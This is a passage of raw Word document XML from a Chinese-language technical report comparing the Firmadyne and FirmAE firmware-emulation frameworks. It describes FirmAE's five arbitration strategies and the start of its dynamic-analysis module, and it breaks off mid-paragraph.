          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。最后，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的自动测试模块，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000579C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态分析工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对目标固件进行检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DD2F89" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC23835" wp14:editId="21F33467">
            <wp:extent cx="4062412" cy="3168350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85884053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70975" cy="3175029"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28754B40" w14:textId="4F642E54" w:rsidR="006C0701" w:rsidRPr="00680D08" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref169823838"/>
      <w:r>
        <w:t>图表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>图表</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构图（来自论文</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref169812660 \r \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D49DBC" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:keepNext/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A2E2385" wp14:editId="27155F76">
            <wp:extent cx="4962525" cy="2072005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5756994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62525" cy="2072005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3F3B7" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Ref169814521"/>
      <w:r>
        <w:t>图表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>图表</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构图（来自论文</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref169809838 \r \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339972B9" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>仲裁仿真</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2E260" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与严格遵循固件的原始执行行为不同，仲裁仿真在遵循原始行为和注入适当的干预措施之间进行仲裁。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 共提供了五种仿真失败的情况，并提出仲裁策略：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55433512" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动仲裁（</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>Boot Arbitrations）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>固件在启动过程中由于初始化程序路径不正确或缺失文件系统结构导致的问题。例如，某些固件使用自定义的初始化程序路径，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>preinit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t>，而不是标准的 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00402341">
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00402341">
        <w:t xml:space="preserve"> 查找一个 hard-coded 文件列表，其中记录常用的启动配置文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。而</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2B68">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB2B68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2B68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修正启动顺序</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2B68">
        <w:t xml:space="preserve">在 image 的 kernel 中，检索 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2B68">
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB2B68">
        <w:t xml:space="preserve"> string 查找启动的配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。同时，还会修复</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21DCF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21DCF">
        <w:t xml:space="preserve"> filesystem corruption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57D639" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络仲裁（</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>Network Arbitrations）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对网络配置问题，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>IP别名处理不当或固件图像缺少网络接口信息。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t xml:space="preserve"> 通过默认设置强制配置网络，例如设置一个具有固定IP地址的以太网接口，并在需要时将其链接到主机的TAP接口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00402341">
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00402341">
        <w:t xml:space="preserve">  创建 host TAP 设备时添加 iptables routing，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00402341">
        <w:t>导致网络冲突</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC204A6" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>非易失性随机存取存储器（</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>NVRAM）仲裁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>NVRAM相关问题，如缺少默认NVRAM文件或NVRAM访问模式与仿真环境不匹配。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t xml:space="preserve"> 在预仿真阶段记录NVRAM访问的键值对，并在最终仿真阶段搜索和使用这些键值对，或者在访问未初始化的键时返回空字符串而不是NULL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60393A21" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核仲裁（</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>Kernel Arbitrations）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决了与内核模块相关的兼容性问题，如固件使用不同版本的内核或内核模块与仿真环境不兼容。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t xml:space="preserve"> 通过拦截库函数调用来模拟特定的内核模块行为，或通过编译选项来解决内核版本兼容性问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FrimAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 也</w:t>
      </w:r>
      <w:r w:rsidRPr="00B202FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟了更多的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B202FB">
        <w:t xml:space="preserve"> kernel module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。与 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相比，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B202FB">
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B202FB">
        <w:t xml:space="preserve"> 实现的 hook 中，硬件名称、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B202FB">
        <w:t>ioctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B202FB">
        <w:t xml:space="preserve"> 函数是固定的，不支持多种 configure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。而</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B202FB">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B202FB">
        <w:t xml:space="preserve"> 利用动态链接机制拦截了所有的 library 访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E77FE6D" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他仲裁（</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>Other Arbitrations）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括对未执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00523441">
        <w:t>Web服务器进行强制执行，设置合适的超时以避免长时间无响应的仿真，以及添加必要的工具到固件文件系统中以支持仿真，例如添加最新版本的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523441">
        <w:t>BusyBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523441">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C68476F" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过这五个仲裁策略，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将仿真的成功率从 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 16.28% 提升到了 79.36%，效果十分显著。</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref169825509 \h</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">图表 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">显示了 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Firmadyne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在网络和 Web 服务上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37892AC4" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟成功率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A78F2" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13B0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>动态分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EAA49" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B13B0C">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B13B0C">
        <w:t>的动态分析部分是其核心功能之一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该部分主要由两个测试模块组成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6917B292" w14:textId="77777777" w:rsidR="006C0701" w:rsidRDefault="006C0701" w:rsidP="006C0701">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化 Web 服务：</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在动态分析之前，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>会自动初始化Web服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:t xml:space="preserve">httpd, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>lighttpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t xml:space="preserve">, boa, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>goahead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E51A7">
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:t>，如果需要的话，还会自动登录。这是因为许多IoT设备的管理界面需要特定的网络和安全配置才能访问。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体来说，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FirmAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E51A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
